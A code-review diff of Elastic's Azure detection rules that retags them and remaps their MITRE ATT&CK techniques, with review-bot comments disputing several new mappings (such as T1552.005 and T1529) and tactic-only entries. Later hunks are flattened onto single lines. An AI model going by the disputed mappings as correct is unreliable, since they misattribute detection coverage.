+ "Data Source: Azure",
+ "Data Source: Azure Platform Logs",
+ "Data Source: Azure Key Vault",
+ "Use Case: Threat Detection",
+ "Use Case: Identity and Access Audit",
+ "Tactic: Credential Access",
+ "Resources: Investigation Guide",
+]
 timestamp_override = "event.ingested"
 type = "esql"
@@ -164,31 +175,19 @@ by Esql.time_window_date_trunc, azure.platformlogs.identity.claim.upn
 [[rule.threat]]
 framework = "MITRE ATT&CK"
-
-[[rule.threat.technique]]
-id = "T1213"
-name = "Data from Information Repositories"
-reference = "https://attack.mitre.org/techniques/T1213/"
-
-[rule.threat.tactic]
-id = "TA0009"
-name = "Collection"
-reference = "https://attack.mitre.org/tactics/TA0009/"
-
-[[rule.threat]]
-framework = "MITRE ATT&CK"
-
 [[rule.threat.technique]]
 id = "T1555"
 name = "Credentials from Password Stores"
 reference = "https://attack.mitre.org/techniques/T1555/"
-
 [[rule.threat.technique.subtechnique]]
 id = "T1555.006"
 name = "Cloud Secrets Management Stores"
 reference = "https://attack.mitre.org/techniques/T1555/006/"
+
+
 [rule.threat.tactic]
 id = "TA0006"
 name = "Credential Access"
 reference = "https://attack.mitre.org/tactics/TA0006/"
+
diff --git a/rules/integrations/azure/credential_access_storage_account_key_regenerated.toml b/rules/integrations/azure/credential_access_storage_account_key_regenerated.toml
index 6bad05244fd..8a88cceeb2f 100644
--- a/rules/integrations/azure/credential_access_storage_account_key_regenerated.toml
+++ b/rules/integrations/azure/credential_access_storage_account_key_regenerated.toml
@@ -2,7 +2,7 @@
 creation_date = "2020/08/19"
 integration = ["azure"]
 maturity = "production"
-updated_date = "2026/03/23"
+updated_date = "2025/09/30"
 [rule]
 author = ["Elastic"]
@@ -67,7 +67,13 @@ references = [
 risk_score = 21
 rule_id = "1e0b832e-957e-43ae-b319-db82d228c908"
 severity = "low"
-tags = ["Domain: Cloud", "Tactic: Persistence", "Data Source: Azure", "Use Case: Identity and Access Audit", "Resources: Investigation Guide"]
+tags = [
+ "Domain: Cloud",
+ "Data Source: Azure",
+ "Use Case: Identity and Access Audit",
+ "Tactic: Credential Access",
+ "Resources: Investigation Guide",
+]
 timestamp_override = "event.ingested"
 type = "query"
@@ -78,18 +84,34 @@ event.dataset:azure.activitylogs and azure.activitylogs.operation_name:"MICROSOF
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+[[rule.threat.technique]]
+id = "T1552"
+name = "Unsecured Credentials"
+reference = "https://attack.mitre.org/techniques/T1552/"
+[[rule.threat.technique.subtechnique]]
+id = "T1552.005"
+name = "Cloud Instance Metadata API"
+reference = "https://attack.mitre.org/techniques/T1552/005/"
+
+[rule.threat.tactic]
+id = "TA0006"
+name = "Credential Access"
+reference = "https://attack.mitre.org/tactics/TA0006/"
+[[rule.threat]]
+framework = "MITRE ATT&CK"
 [[rule.threat.technique]]
 id = "T1098"
 name = "Account Manipulation"
 reference = "https://attack.mitre.org/techniques/T1098/"
-
 [[rule.threat.technique.subtechnique]]
 id = "T1098.001"
 name = "Additional Cloud Credentials"
 reference = "https://attack.mitre.org/techniques/T1098/001/"
+
 [rule.threat.tactic]
 id = "TA0003"
 name = "Persistence"
 reference = "https://attack.mitre.org/tactics/TA0003/"
+
diff --git a/rules/integrations/azure/defense_evasion_automation_runbook_deleted.toml b/rules/integrations/azure/defense_evasion_automation_runbook_deleted.toml
index 663788378b1..d9817465e01 100644
--- a/rules/integrations/azure/defense_evasion_automation_runbook_deleted.toml
+++ b/rules/integrations/azure/defense_evasion_automation_runbook_deleted.toml
@@ -2,7 +2,7 @@
 creation_date = "2020/09/01"
 integration = ["azure"]
 maturity = "production"
-updated_date = "2026/03/23"
+updated_date = "2025/12/10"
 [rule]
 author = ["Elastic"]
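Review bot: The new Credential Access entry in `@@ -78,18 +84,34 @@` uses sub-technique `T1552.005` Cloud Instance Metadata API, but this rule fires on a storage-account key regeneration operation (the `azure.activitylogs.operation_name:"MICROSOF…"` clause in the hunk header), which does not involve the instance metadata service. If a Credential Access mapping is wanted, the parent `T1552` Unsecured Credentials on its own, or the `T1098.001` Additional Cloud Credentials entry already present under Persistence, seems to describe the event; the `.005` sub-technique will mislead anyone pivoting from ATT&CK coverage. The lines in question are `+id = "T1552.005"`, `+name = "Cloud Instance Metadata API"` and `+reference = "https://attack.mitre.org/techniques/T1552/005/"`.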
@@ -62,7 +62,7 @@ references = [
 risk_score = 21
 rule_id = "8ddab73b-3d15-4e5d-9413-47f05553c1d7"
 severity = "low"
-tags = ["Domain: Cloud", "Tactic: Defense Evasion", "Tactic: Impact", "Data Source: Azure", "Use Case: Configuration Audit", "Resources: Investigation Guide"]
+tags = ["Domain: Cloud", "Data Source: Azure", "Use Case: Configuration Audit", "Tactic: Defense Evasion", "Resources: Investigation Guide"]
 timestamp_override = "event.ingested"
 type = "query"
@@ -76,25 +76,8 @@ event.dataset:azure.activitylogs and
 [[rule.threat]]
 framework = "MITRE ATT&CK"
-[[rule.threat.technique]]
-id = "T1070"
-name = "Indicator Removal"
-reference = "https://attack.mitre.org/techniques/T1070/"
-
 [rule.threat.tactic]
 id = "TA0005"
 name = "Defense Evasion"
 reference = "https://attack.mitre.org/tactics/TA0005/"
-[[rule.threat]]
-framework = "MITRE ATT&CK"
-
-[[rule.threat.technique]]
-id = "T1485"
-name = "Data Destruction"
-reference = "https://attack.mitre.org/techniques/T1485/"
-
-[rule.threat.tactic]
-id = "TA0040"
-name = "Impact"
-reference = "https://attack.mitre.org/tactics/TA0040/"
diff --git a/rules/integrations/azure/defense_evasion_insights_diagnostic_settings_deletion.toml b/rules/integrations/azure/defense_evasion_insights_diagnostic_settings_deletion.toml
index aec440c0508..7f1c35aedb6 100644
--- a/rules/integrations/azure/defense_evasion_insights_diagnostic_settings_deletion.toml
+++ b/rules/integrations/azure/defense_evasion_insights_diagnostic_settings_deletion.toml
@@ -2,7 +2,7 @@
 creation_date = "2020/08/17"
 integration = ["azure"]
 maturity = "production"
-updated_date = "2026/03/23"
+updated_date = "2025/12/10"
 [rule]
 author = ["Elastic"]
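Review bot: After `@@ -76,25 +76,8 @@` the single remaining `[[rule.threat]]` entry has `[rule.threat.tactic]` Defense Evasion but no `[[rule.threat.technique]]` at all, since `T1070` was removed along with the whole Impact entry. A tactic-only mapping loads fine but gives coverage tooling nothing to attribute, and the rewritten tags still carry `"Tactic: Defense Evasion"`. If a runbook deletion is meant to stay on Defense Evasion, a technique should be re-attached; if tactic-only is deliberate, say so in the rule description so it is not read as an omission.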
@@ -84,21 +84,27 @@ event.dataset:azure.activitylogs
 [[rule.threat]]
 framework = "MITRE ATT&CK"
-
 [[rule.threat.technique]]
 id = "T1562"
 name = "Impair Defenses"
 reference = "https://attack.mitre.org/techniques/T1562/"
+[[rule.threat.technique.subtechnique]]
+id = "T1562.001"
+name = "Disable or Modify Tools"
+reference = "https://attack.mitre.org/techniques/T1562/001/"
 [[rule.threat.technique.subtechnique]]
 id = "T1562.008"
 name = "Disable or Modify Cloud Logs"
 reference = "https://attack.mitre.org/techniques/T1562/008/"
+
+
 [rule.threat.tactic]
 id = "TA0005"
 name = "Defense Evasion"
 reference = "https://attack.mitre.org/tactics/TA0005/"
+
 [rule.investigation_fields]
 field_names = [
 "@timestamp",
diff --git a/rules/integrations/azure/defense_evasion_kubernetes_events_deleted.toml b/rules/integrations/azure/defense_evasion_kubernetes_events_deleted.toml
index 4e60e6ae26d..76a3d0239cb 100644
--- a/rules/integrations/azure/defense_evasion_kubernetes_events_deleted.toml
+++ b/rules/integrations/azure/defense_evasion_kubernetes_events_deleted.toml
@@ -2,7 +2,7 @@
 creation_date = "2021/06/24"
 integration = ["azure"]
 maturity = "production"
-updated_date = "2026/03/23"
+updated_date = "2025/12/10"
 [rule]
 author = ["Austin Songer"]
@@ -80,13 +80,19 @@ event.outcome:(Success or success)
 [[rule.threat]]
 framework = "MITRE ATT&CK"
-
 [[rule.threat.technique]]
-id = "T1070"
-name = "Indicator Removal"
-reference = "https://attack.mitre.org/techniques/T1070/"
+id = "T1562"
+name = "Impair Defenses"
+reference = "https://attack.mitre.org/techniques/T1562/"
+[[rule.threat.technique.subtechnique]]
+id = "T1562.001"
+name = "Disable or Modify Tools"
+reference = "https://attack.mitre.org/techniques/T1562/001/"
+
+
 [rule.threat.tactic]
 id = "TA0005"
 name = "Defense Evasion"
 reference = "https://attack.mitre.org/tactics/TA0005/"
+
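Review bot: The Kubernetes events-deleted hunk `@@ -80,13 +80,19 @@` now maps the rule to `T1562.001` Disable or Modify Tools, but deleting event records removes log data rather than tampering with a security tool, so `T1562.008` Disable or Modify Cloud Logs — the sub-technique the diagnostic-settings rule keeps in the preceding `@@ -84,21 +84,27 @@` hunk — seems the closer fit under the same `T1562` parent. Worth a second look before the mapping lands, since the two rules describe the same class of evidence removal.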
diff --git a/rules/integrations/azure/defense_evasion_network_watcher_deletion.toml b/rules/integrations/azure/defense_evasion_network_watcher_deletion.toml
index 9c69e71409e..0acbfc2f754 100644
--- a/rules/integrations/azure/defense_evasion_network_watcher_deletion.toml
+++ b/rules/integrations/azure/defense_evasion_network_watcher_deletion.toml
@@ -2,7 +2,7 @@
 creation_date = "2020/08/31"
 integration = ["azure"]
 maturity = "production"
-updated_date = "2026/03/23"
+updated_date = "2025/12/10"
 [rule]
 author = ["Elastic"]
@@ -81,23 +81,19 @@ event.dataset:azure.activitylogs and azure.activitylogs.operation_name:"MICROSOF
 [[rule.threat]]
 framework = "MITRE ATT&CK"
-
 [[rule.threat.technique]]
 id = "T1562"
 name = "Impair Defenses"
 reference = "https://attack.mitre.org/techniques/T1562/"
-
 [[rule.threat.technique.subtechnique]]
 id = "T1562.001"
 name = "Disable or Modify Tools"
 reference = "https://attack.mitre.org/techniques/T1562/001/"
-[[rule.threat.technique.subtechnique]]
-id = "T1562.008"
-name = "Disable or Modify Cloud Logs"
-reference = "https://attack.mitre.org/techniques/T1562/008/"
+
 [rule.threat.tactic]
 id = "TA0005"
 name = "Defense Evasion"
 reference = "https://attack.mitre.org/tactics/TA0005/"
+
diff --git a/rules/integrations/azure/defense_evasion_security_alert_suppression_rule_created.toml b/rules/integrations/azure/defense_evasion_security_alert_suppression_rule_created.toml
index 8ef3beefa07..5421c5675f8 100644
--- a/rules/integrations/azure/defense_evasion_security_alert_suppression_rule_created.toml
+++ b/rules/integrations/azure/defense_evasion_security_alert_suppression_rule_created.toml
@@ -2,7 +2,7 @@
 creation_date = "2021/08/27"
 integration = ["azure"]
 maturity = "production"
-updated_date = "2026/03/23"
+updated_date = "2025/12/10"
 [rule]
 author = ["Austin Songer"]
@@ -81,18 +81,14 @@ event.outcome: "success"
 [[rule.threat]]
 framework = "MITRE ATT&CK"
-
 [[rule.threat.technique]]
 id = "T1562"
 name = "Impair Defenses"
 reference = "https://attack.mitre.org/techniques/T1562/"
-[[rule.threat.technique.subtechnique]]
-id = "T1562.001"
-name = "Disable or Modify Tools"
-reference = "https://attack.mitre.org/techniques/T1562/001/"
 [rule.threat.tactic]
 id = "TA0005"
 name = "Defense Evasion"
 reference = "https://attack.mitre.org/tactics/TA0005/"
+
diff --git a/rules/integrations/azure/discovery_bloodhound_user_agents_detected.toml b/rules/integrations/azure/discovery_bloodhound_user_agents_detected.toml
index a537e8045fc..dcdc2b1b80e 100644
--- a/rules/integrations/azure/discovery_bloodhound_user_agents_detected.toml
+++ b/rules/integrations/azure/discovery_bloodhound_user_agents_detected.toml
@@ -2,7 +2,7 @@
 creation_date = "2025/06/03"
 integration = ["azure", "o365"]
 maturity = "production"
-updated_date = "2026/03/23"
+updated_date = "2025/12/10"
 [rule]
 author = ["Elastic"]
@@ -118,27 +118,36 @@ any where event.dataset : (
 [[rule.threat]]
 framework = "MITRE ATT&CK"
-
 [[rule.threat.technique]]
 id = "T1069"
 name = "Permission Groups Discovery"
 reference = "https://attack.mitre.org/techniques/T1069/"
-
 [[rule.threat.technique.subtechnique]]
 id = "T1069.003"
 name = "Cloud Groups"
 reference = "https://attack.mitre.org/techniques/T1069/003/"
+
+[[rule.threat.technique]]
+id = "T1082"
+name = "System Information Discovery"
+reference = "https://attack.mitre.org/techniques/T1082/"
+
 [[rule.threat.technique]]
 id = "T1087"
 name = "Account Discovery"
 reference = "https://attack.mitre.org/techniques/T1087/"
-
 [[rule.threat.technique.subtechnique]]
 id = "T1087.004"
 name = "Cloud Account"
 reference = "https://attack.mitre.org/techniques/T1087/004/"
+
+[[rule.threat.technique]]
+id = "T1201"
+name = "Password Policy Discovery"
+reference = "https://attack.mitre.org/techniques/T1201/"
+
 [[rule.threat.technique]]
 id = "T1526"
 name = "Cloud Service Discovery"
@@ -149,7 +158,14 @@ id = "T1580"
 name = "Cloud Infrastructure Discovery"
 reference = "https://attack.mitre.org/techniques/T1580/"
+[[rule.threat.technique]]
+id = "T1673"
+name = "Virtual Machine Discovery"
+reference = "https://attack.mitre.org/techniques/T1673/"
+
+
 [rule.threat.tactic]
 id = "TA0007"
 name = "Discovery"
 reference = "https://attack.mitre.org/tactics/TA0007/"
+
diff --git a/rules/integrations/azure/discovery_entra_id_teamfiltration_user_agents_detected.toml b/rules/integrations/azure/discovery_entra_id_teamfiltration_user_agents_detected.toml
index 34fc96dc32c..d8c4b0c0ae9 100644
--- a/rules/integrations/azure/discovery_entra_id_teamfiltration_user_agents_detected.toml
+++ b/rules/integrations/azure/discovery_entra_id_teamfiltration_user_agents_detected.toml
@@ -2,7 +2,7 @@
 creation_date = "2025/07/02"
 integration = ["azure", "o365"]
 maturity = "production"
-updated_date = "2026/03/23"
+updated_date = "2025/12/10"
 [rule]
 author = ["Elastic"]
@@ -79,7 +79,18 @@ references = [
 risk_score = 47
 rule_id = "f541ca3a-5752-11f0-b44b-f661ea17fbcd"
 severity = "medium"
-tags = ["Domain: Cloud", "Tactic: Credential Access", "Tactic: Discovery", "Data Source: Azure", "Data Source: Microsoft 365", "Data Source: Microsoft 365 Audit Logs", "Data Source: Microsoft Entra ID", "Data Source: Microsoft Entra ID Sign-in Logs", "Use Case: Identity and Access Audit", "Use Case: Threat Detection", "Resources: Investigation Guide"]
+tags = [
+ "Domain: Cloud",
+ "Data Source: Azure",
+ "Data Source: Microsoft 365",
+ "Data Source: Microsoft 365 Audit Logs",
+ "Data Source: Microsoft Entra ID",
+ "Data Source: Microsoft Entra ID Sign-in Logs",
+ "Use Case: Identity and Access Audit",
+ "Use Case: Threat Detection",
+ "Tactic: Discovery",
+ "Resources: Investigation Guide",
+]
 timestamp_override = "event.ingested"
 type = "query"
@@ -92,46 +103,71 @@ event.dataset:("azure.signinlogs" or "o365.audit")
 [[rule.threat]]
 framework = "MITRE ATT&CK"
-
-[[rule.threat.technique]]
-id = "T1110"
-name = "Brute Force"
-reference = "https://attack.mitre.org/techniques/T1110/"
-
-[[rule.threat.technique.subtechnique]]
-id = "T1110.003"
-name = "Password Spraying"
-reference = "https://attack.mitre.org/techniques/T1110/003/"
-
-[rule.threat.tactic]
-id = "TA0006"
-name = "Credential Access"
-reference = "https://attack.mitre.org/tactics/TA0006/"
-
-[[rule.threat]]
-framework = "MITRE ATT&CK"
-
 [[rule.threat.technique]]
 id = "T1069"
 name = "Permission Groups Discovery"
 reference = "https://attack.mitre.org/techniques/T1069/"
-
 [[rule.threat.technique.subtechnique]]
 id = "T1069.003"
 name = "Cloud Groups"
 reference = "https://attack.mitre.org/techniques/T1069/003/"
+
+[[rule.threat.technique]]
+id = "T1082"
+name = "System Information Discovery"
+reference = "https://attack.mitre.org/techniques/T1082/"
+
 [[rule.threat.technique]]
 id = "T1087"
 name = "Account Discovery"
 reference = "https://attack.mitre.org/techniques/T1087/"
-
 [[rule.threat.technique.subtechnique]]
 id = "T1087.004"
 name = "Cloud Account"
 reference = "https://attack.mitre.org/techniques/T1087/004/"
+
+[[rule.threat.technique]]
+id = "T1201"
+name = "Password Policy Discovery"
+reference = "https://attack.mitre.org/techniques/T1201/"
+
+[[rule.threat.technique]]
+id = "T1526"
+name = "Cloud Service Discovery"
+reference = "https://attack.mitre.org/techniques/T1526/"
+
+[[rule.threat.technique]]
+id = "T1580"
+name = "Cloud Infrastructure Discovery"
+reference = "https://attack.mitre.org/techniques/T1580/"
+
+[[rule.threat.technique]]
+id = "T1673"
+name = "Virtual Machine Discovery"
+reference = "https://attack.mitre.org/techniques/T1673/"
+
+
 [rule.threat.tactic]
 id = "TA0007"
 name = "Discovery"
 reference = "https://attack.mitre.org/tactics/TA0007/"
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+[[rule.threat.technique]]
+id = "T1110"
+name = 
"Brute Force"
+reference = "https://attack.mitre.org/techniques/T1110/"
+[[rule.threat.technique.subtechnique]]
+id = "T1110.003"
+name = "Password Spraying"
+reference = "https://attack.mitre.org/techniques/T1110/003/"
+
+
+
+[rule.threat.tactic]
+id = "TA0006"
+name = "Credential Access"
+reference = "https://attack.mitre.org/tactics/TA0006/"
+
diff --git a/rules/integrations/azure/discovery_storage_blob_container_access_modification.toml b/rules/integrations/azure/discovery_storage_blob_container_access_modification.toml
index 36e63b171e3..f39b0218f9a 100644
--- a/rules/integrations/azure/discovery_storage_blob_container_access_modification.toml
+++ b/rules/integrations/azure/discovery_storage_blob_container_access_modification.toml
@@ -2,7 +2,7 @@
 creation_date = "2020/08/20"
 integration = ["azure"]
 maturity = "production"
-updated_date = "2026/03/23"
+updated_date = "2025/12/10"
 [rule]
 author = ["Elastic"]
@@ -64,7 +64,7 @@ references = ["https://docs.microsoft.com/en-us/azure/storage/blobs/anonymous-re
 risk_score = 21
 rule_id = "2636aa6c-88b5-4337-9c31-8d0192a8ef45"
 severity = "low"
-tags = ["Domain: Cloud", "Tactic: Defense Evasion", "Data Source: Azure", "Use Case: Asset Visibility", "Resources: Investigation Guide"]
+tags = ["Domain: Cloud", "Data Source: Azure", "Use Case: Asset Visibility", "Tactic: Discovery", "Resources: Investigation Guide"]
 timestamp_override = "event.ingested"
 type = "query"
@@ -75,13 +75,38 @@ event.dataset:azure.activitylogs and azure.activitylogs.operation_name:"MICROSOF
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+[[rule.threat.technique]]
+id = "T1619"
+name = "Cloud Storage Object Discovery"
+reference = "https://attack.mitre.org/techniques/T1619/"
+
+[rule.threat.tactic]
+id = "TA0007"
+name = "Discovery"
+reference = "https://attack.mitre.org/tactics/TA0007/"
+[[rule.threat]]
+framework = "MITRE ATT&CK"
 [[rule.threat.technique]]
 id = "T1222"
 name = "File and Directory Permissions Modification"
 reference = "https://attack.mitre.org/techniques/T1222/"
+
 [rule.threat.tactic]
 id = "TA0005"
 name = "Defense Evasion"
 reference = "https://attack.mitre.org/tactics/TA0005/"
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+[[rule.threat.technique]]
+id = "T1537"
+name = "Transfer Data to Cloud Account"
+reference = "https://attack.mitre.org/techniques/T1537/"
+
+
+[rule.threat.tactic]
+id = "TA0010"
+name = "Exfiltration"
+reference = "https://attack.mitre.org/tactics/TA0010/"
+
diff --git a/rules/integrations/azure/exfiltration_azure_storage_blob_download_azcopy_sas_token.toml b/rules/integrations/azure/exfiltration_azure_storage_blob_download_azcopy_sas_token.toml
index 0a1058aa6b4..ca5229f3624 100644
--- a/rules/integrations/azure/exfiltration_azure_storage_blob_download_azcopy_sas_token.toml
+++ b/rules/integrations/azure/exfiltration_azure_storage_blob_download_azcopy_sas_token.toml
@@ -2,7 +2,7 @@
 creation_date = "2025/10/02"
 integration = ["azure"]
 maturity = "production"
-updated_date = "2026/03/23"
+updated_date = "2025/10/02"
 [rule]
 author = ["Elastic"]
@@ -71,7 +71,16 @@ To ensure this rule functions correctly, the following diagnostic logs must be e - StorageRead: This log captures all read operations performed on blobs in the storage account, including GetBlob operations. These logs should be streamed to the Event Hub used for the Azure integration configuration. """ severity = "medium" -tags = ["Domain: Cloud", "Domain: Storage", "Tactic: Collection", "Data Source: Azure", "Data Source: Azure Platform Logs", "Data Source: Azure Storage", "Use Case: Threat Detection", "Resources: Investigation Guide"] +tags = [ + "Domain: Cloud", + "Domain: Storage", + "Data Source: Azure", + "Data Source: Azure Platform Logs", + "Data Source: Azure Storage", + "Use Case: Threat Detection", + "Tactic: Exfiltration", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "new_terms" @@ -86,16 +95,22 @@ event.dataset: azure.platformlogs and [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1530" -name = "Data from Cloud Storage" -reference = "https://attack.mitre.org/techniques/T1530/" +id = "T1567" +name = "Exfiltration Over Web Service" +reference = "https://attack.mitre.org/techniques/T1567/" +[[rule.threat.technique.subtechnique]] +id = "T1567.002" +name = "Exfiltration to Cloud Storage" +reference = "https://attack.mitre.org/techniques/T1567/002/" + + [rule.threat.tactic] -id = "TA0009" -name = "Collection" -reference = "https://attack.mitre.org/tactics/TA0009/" +id = "TA0010" +name = "Exfiltration" +reference = "https://attack.mitre.org/tactics/TA0010/" + [rule.new_terms] field = "new_terms_fields" value = ["azure.platformlogs.properties.accountName"] diff --git a/rules/integrations/azure/impact_azure_compute_vm_snapshot_deletion.toml b/rules/integrations/azure/impact_azure_compute_vm_snapshot_deletion.toml index c9a25709e1b..be0e1e3a0ca 100644 --- a/rules/integrations/azure/impact_azure_compute_vm_snapshot_deletion.toml 
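Review bot: Replacing T1530 (Data from Cloud Storage) with T1567.002 removes the technique that literally describes what the setup text in this hunk says the rule keys on (StorageRead/GetBlob operations), so coverage reporting will no longer attribute this rule to Collection. If the intent is to emphasise the exfiltration outcome, consider keeping the original `[[rule.threat]]` entry (T1530 under TA0009) next to the new Exfiltration entry and adding `"Tactic: Collection",` back to the tags, rather than swapping one for the other. Whether a SAS-token download is better characterised as collection or exfiltration is a judgement call; the point is not to lose the more specific mapping.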
+++ b/rules/integrations/azure/impact_azure_compute_vm_snapshot_deletion.toml @@ -2,7 +2,7 @@ creation_date = "2025/10/10" integration = ["azure"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/10/10" [rule] author = ["Elastic"] @@ -106,16 +106,22 @@ field_names = [ [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1485" +name = "Data Destruction" +reference = "https://attack.mitre.org/techniques/T1485/" [[rule.threat.technique]] id = "T1490" name = "Inhibit System Recovery" reference = "https://attack.mitre.org/techniques/T1490/" + [rule.threat.tactic] id = "TA0040" name = "Impact" reference = "https://attack.mitre.org/tactics/TA0040/" + [rule.new_terms] field = "new_terms_fields" value = ["azure.activitylogs.identity.claims_initiated_by_user.name", "azure.resource.group"] diff --git a/rules/integrations/azure/impact_azure_compute_vm_snapshot_deletions.toml b/rules/integrations/azure/impact_azure_compute_vm_snapshot_deletions.toml index 59ba9cdf06c..6592f3dc246 100644 --- a/rules/integrations/azure/impact_azure_compute_vm_snapshot_deletions.toml +++ b/rules/integrations/azure/impact_azure_compute_vm_snapshot_deletions.toml @@ -2,7 +2,7 @@ creation_date = "2025/10/10" integration = ["azure"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/10/10" [rule] author = ["Elastic"] @@ -110,16 +110,22 @@ field_names = [ [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1485" +name = "Data Destruction" +reference = "https://attack.mitre.org/techniques/T1485/" [[rule.threat.technique]] id = "T1490" name = "Inhibit System Recovery" reference = "https://attack.mitre.org/techniques/T1490/" + [rule.threat.tactic] id = "TA0040" name = "Impact" reference = "https://attack.mitre.org/tactics/TA0040/" + [rule.threshold] field = ["azure.activitylogs.identity.claims_initiated_by_user.name"] value = 1 
diff --git a/rules/integrations/azure/impact_azure_storage_account_deletion.toml b/rules/integrations/azure/impact_azure_storage_account_deletion.toml index aff443ad71c..880e9a87e2f 100644 --- a/rules/integrations/azure/impact_azure_storage_account_deletion.toml +++ b/rules/integrations/azure/impact_azure_storage_account_deletion.toml @@ -2,7 +2,7 @@ creation_date = "2025/10/08" integration = ["azure"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/10/08" [rule] author = ["Elastic"] @@ -86,16 +86,22 @@ event.dataset: azure.activitylogs and [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1485" name = "Data Destruction" reference = "https://attack.mitre.org/techniques/T1485/" +[[rule.threat.technique]] +id = "T1489" +name = "Service Stop" +reference = "https://attack.mitre.org/techniques/T1489/" + + [rule.threat.tactic] id = "TA0040" name = "Impact" reference = "https://attack.mitre.org/tactics/TA0040/" + [rule.new_terms] field = "new_terms_fields" value = ["azure.activitylogs.identity.claims_initiated_by_user.name"] diff --git a/rules/integrations/azure/impact_azure_storage_account_deletion_multiple.toml b/rules/integrations/azure/impact_azure_storage_account_deletion_multiple.toml index b35f1bf641c..b3ce7ddb0c8 100644 --- a/rules/integrations/azure/impact_azure_storage_account_deletion_multiple.toml +++ b/rules/integrations/azure/impact_azure_storage_account_deletion_multiple.toml @@ -2,7 +2,7 @@ creation_date = "2025/10/08" integration = ["azure"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/10/08" [rule] author = ["Elastic"] 
@@ -90,16 +90,22 @@ event.dataset: azure.activitylogs and [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1485" name = "Data Destruction" reference = "https://attack.mitre.org/techniques/T1485/" +[[rule.threat.technique]] +id = "T1489" +name = "Service Stop" +reference = "https://attack.mitre.org/techniques/T1489/" + + [rule.threat.tactic] id = "TA0040" name = "Impact" reference = "https://attack.mitre.org/tactics/TA0040/" + [rule.threshold] field = ["azure.activitylogs.identity.claims_initiated_by_user.name"] value = 1 diff --git a/rules/integrations/azure/impact_key_vault_modified_by_unusual_user.toml b/rules/integrations/azure/impact_key_vault_modified_by_unusual_user.toml index 860bd202ab1..8388ea6ebe5 100644 --- a/rules/integrations/azure/impact_key_vault_modified_by_unusual_user.toml +++ b/rules/integrations/azure/impact_key_vault_modified_by_unusual_user.toml @@ -2,7 +2,7 @@ creation_date = "2020/08/31" integration = ["azure"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/10" [rule] author = ["Elastic"] @@ -78,6 +78,14 @@ event.dataset: "azure.activitylogs" ''' +[[rule.threat]] +framework = "MITRE ATT&CK" + +[rule.threat.tactic] +id = "TA0040" +name = "Impact" +reference = "https://attack.mitre.org/tactics/TA0040/" + [rule.new_terms] field = "new_terms_fields" value = ["azure.activitylogs.identity.claims_initiated_by_user.name"] diff --git a/rules/integrations/azure/impact_kubernetes_pod_deleted.toml b/rules/integrations/azure/impact_kubernetes_pod_deleted.toml index 31098219fe4..e1be4f4ec17 100644 --- a/rules/integrations/azure/impact_kubernetes_pod_deleted.toml +++ b/rules/integrations/azure/impact_kubernetes_pod_deleted.toml @@ -2,7 +2,7 @@ creation_date = "2021/06/24" integration = ["azure"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/10" [rule] author = ["Austin Songer"] 
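Review bot: The key-vault hunk (`@@ -78,6 +78,14 @@`) adds an Impact entry that carries a tactic but no `[[rule.threat.technique]]`, and the rule's `tags` line is not part of this diff, so it cannot be seen here whether `"Tactic: Impact"` is present; the same applies to the oauth user-impersonation-scope hunk at the end of this chunk, which adds a Defense Evasion entry without touching tags. If those tag lines were left as they were, a tag-per-mapped-tactic check would flag them, so please confirm or add the tag in each. A tactic-only mapping is valid, but if a technique fits the key-vault modification it would make the mapping more useful; if none does, a short rationale in the PR description would help reviewers.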
@@ -78,13 +78,19 @@ event.outcome:(Success or success) [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1489" name = "Service Stop" reference = "https://attack.mitre.org/techniques/T1489/" +[[rule.threat.technique]] +id = "T1529" +name = "System Shutdown/Reboot" +reference = "https://attack.mitre.org/techniques/T1529/" + + [rule.threat.tactic] id = "TA0040" name = "Impact" reference = "https://attack.mitre.org/tactics/TA0040/" + diff --git a/rules/integrations/azure/impact_resources_resource_group_deletion.toml b/rules/integrations/azure/impact_resources_resource_group_deletion.toml index 86099be4468..a28f3b45431 100644 --- a/rules/integrations/azure/impact_resources_resource_group_deletion.toml +++ b/rules/integrations/azure/impact_resources_resource_group_deletion.toml @@ -2,7 +2,7 @@ creation_date = "2020/08/17" integration = ["azure"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/10" [rule] author = ["Elastic"] @@ -80,13 +80,31 @@ event.dataset:azure.activitylogs and azure.activitylogs.operation_name:"MICROSOF [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1485" name = "Data Destruction" reference = "https://attack.mitre.org/techniques/T1485/" + [rule.threat.tactic] id = "TA0040" name = "Impact" reference = "https://attack.mitre.org/tactics/TA0040/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1562" +name = "Impair Defenses" +reference = "https://attack.mitre.org/techniques/T1562/" +[[rule.threat.technique.subtechnique]] +id = "T1562.001" +name = "Disable or Modify Tools" +reference = "https://attack.mitre.org/techniques/T1562/001/" + + + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" + 
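Review bot: T1529 (System Shutdown/Reboot) is added to the pod-deletion rule and T1562.001 (Disable or Modify Tools) to the resource-group deletion rule in the second hunk on this line, and both are a stretch for the events described: deleting a pod or a resource group is not a host shutdown, and T1562.001 is about defensive tooling, which a resource group only contains incidentally. T1489 and T1485 already cover these rules well, so I'd keep the new mappings only where there is a specific rationale (for example, resource groups known to host security tooling). If the Defense Evasion entry stays, the resource-group rule's tags — not touched in this diff — need `"Tactic: Defense Evasion",` added.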
